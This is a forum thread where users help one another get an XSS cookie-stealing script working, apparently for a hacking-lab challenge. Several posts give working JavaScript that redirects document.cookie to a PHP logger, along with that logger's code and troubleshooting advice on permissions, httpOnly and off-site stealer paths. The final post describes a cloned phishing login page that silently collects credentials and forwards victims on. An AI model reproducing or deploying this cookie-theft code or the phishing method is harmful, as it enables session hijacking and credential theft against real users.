need a little help with a cookie grab script...

[wlandymore]

Hey, I'm testing something out on my local machine and it seems like it's working 95% but I can't get it to write my cookies to the file I've set for it. I have a php script on my server with a text file it can write to and then I'm loading an html file with the <script> in the header.

So I have:
<html>
<head>
<script language="JavaScript">document.location= "win.php?c=" + document.cookie$
</head>
<body>
This page is a test
</body>
</html>

And then that goes to my php file:
<?php
$cookie = $HTTP_GET_VARS["c"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
echo "<script>location.href='http://www.google.com';</script>";
?>

So this seems to work on the surface because it's redirecting me to google like I wanted, but it won't write the cookie information from the browser to the "cookielog.txt" file that's in the same directory.

Can anyone see what I'm missing?

[ajohnson]

Are you ever setting a cookie?

What do you see when you load this html page in a browser?

Code:

<html>
<head>
<script language="JavaScript">alert(document.cookie)</script>
</head>
<body>
This page is a test
</body>
</html>

Also, I assume the $ in your code is supposed to be </script>. It doesn't look like that pasted correctly.

[wlandymore]

I got the pop up window and then when you click 'ok' it disappears and you see the 'test' message.

Yeah, that $ was because I was in 'nano' and the line hadn't wrapped. The code should be:

<html>
<head>
<script language="JavaScript">document.location= "win.php?c=" + document.cookie;</script>
</head>
<body>

This page is a test

</body>
</html>

I had that same code you used to test it out first and this OS i'm using is vulnerable to this type of code where I would be able to swipe the cookies from the browser and then write them to a file, but I'm missing something. I got it working where it was writing out the string with the IP and then cookie= (and it wouldn't write a cookie because I'm not giving it one), but when I went to the URL that had cookies it did the same thing.

Right now with my current code the forwarding is working but it won't pop open the cookielog.txt file and write the information in there that I need...

[ajohnson]

$HTTP_GET_VARS might work differently. It's been deprecated and replaced with $_GET.

Code:

<html>
<head>
<script language="JavaScript">
document.cookie="test=1234";
document.location= "win.php?c=" + document.cookie
</script>
</head>
<body>
This page is a test
</body>
</html>



<?php
$cookie = $_GET["c"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
echo "<script>location.href='http://www.google.com';</script>";
?>



cookielog.txt:

test=1234

Edit: it looks like $HTTP_GET_VARS has been disabled by default since 5.0.3. In the future, try using print_r($array) to troubleshoot; that'll give you a quick peak at everything that's in $_POST, $_GET, or $_REQUEST (both combined).

[wlandymore]

it definitely writes the 1234 to the file if it's defined explicitly, but if you don't have that there it won't scrape out the session cookie like I need. I'll keep on messing around with it and see if I can get more information in the file.

Thanks.

[ajohnson]

Where is the session cookie coming from?

Are you going across domain boundaries?

[wlandymore]

yeah, it would be I guess.

It works if I go to the message board and put in:
<SCRIPT>alert(document.cookie);</SCRIPT>

and then post it. It will show me the cookie session etc, but I need some way really to use just javascript to then write this to a file or something. That's what I was trying to do before because I just have a little test site setup and then I'm trying to capture the cookie and send it out to that other file. Basically taking the cookie from the session on tespage.com and then sending it to capture.com.

I would totally agree that normally this shouldn't be possible but in this case I'm attacking a server that I know is vulnerable...

[wlandymore]

what about a POST method?

So if I get a valid session and then click on a link that's embedded into that site which takes me to the malicious site that loads a POST method right away going back to the original site to get the cookie...would that work?

And if so, what kind of options would I have for getting this to work?

[gromic]

Hi wlandymore, hi ajohnson

The following code (cookie_site.html and cookiestealer.php  ) should work (Seems that you just missed a / before your stealer script redirect in your html page).

I tested it via a xampp setup and it worked.

Just throw both of the files into your XAMPP htdocs.

file: cookie_site.html

Code:

<html>
    <head>
    <script type="text/javascript"> document.cookie = "Test123";</script>
    </head>
  <body>
    This page is a test
    <script> alert(document.cookie)</script>
    <script> document.location = "/cookiestealer.php?cookie=" + document.cookie; </script>
  </body>
</html>

file: cookiestealer.php

Code:

<?php
  $cookie = $_GET['cookie'];
  $log = fopen("cookielog.txt", "a");
  fwrite($log, $cookie ."\n");
  fclose($log);
?>

Note:

• So far, page and stealer.php run on the same server (I know...not intended). When you move your stealer.php to another server you have to adjust your path i.e. “http://<Server IP >/cookiestealer.php?cookie=” … and so on..
• One more tip: When debugging your scripts make sure you delete your browsers cache each time... very often I changed something but my browser (Chrome) showed me still the old results 
• cross domain issues should't be a problem since as far as I understood the idea was to place the "stealer script" on a site which is vuln to XSS and steal the cookies related to THIS site, right? If you want to read cookies of another domain you run into "same orgin" issues..
  

Hope this helps and works for you.

[MaXe]

Okay here's a few things you should make sure of.

1. Since you're using fopen(), in some cases (but not this), make sure you read the "manual" http://php.net/manual/en/function.fopen.php (People tend to set the wrong "flag", but 'a' is 100% correct in this case.

2. If the cookielog.txt file isn't created, what are the permissions for that particular directory? (644 would most likely not work, 755 would work, but this depends on who is set to own the directory as well.)
If the file is created, is the file cookielog.txt set to be writeable? (Otherwise nothing will be written to this file.)

3. More importantly, is the cookie you're trying to steal, httpOnly? Can you read it with alert(document.cookie) ? If yes, you should be able to steal it too then.

4. document.location = "/cookiestealer.php?cookie=" + document.cookie;
Make sure to include the full path, do not use "/cookiestealer.php" unless you're on the exact same server AND directory. Otherwise, you may end up trying to write to the wrong file. Use an intercepting proxy to see if your HTTP requests are going the right place.

Even though it seems like you did everything right, except perhaps giving cookielog.txt the right file permissions, or that the cookies could be httpOnly. (I haven't read all of the replies, sorry. )

[wlandymore]

Hey, thanks for all the tips guys.

I ended up doing something slightly different last night because I couldn't make this one work at the time. I actually created a replica of the site itself and then posted the link to the forum like before. This said there was a problem with their login, except in this case I was using a POST method on the form to post it to the file. It worked well and then I was able to do it in the background and direct the user to the new site that the link was supposed to be for, all invisible to the 'victim'.

This was part of a hacking-lab challenge so I don't know if they'll be okay with that route but it seems like it's doing exactly the same thing because I'm forwarding the victim to my site, getting the information and then sending them on.

However, I'll still give the tips you posted a try so I'm familiar with that way too. Thanks again.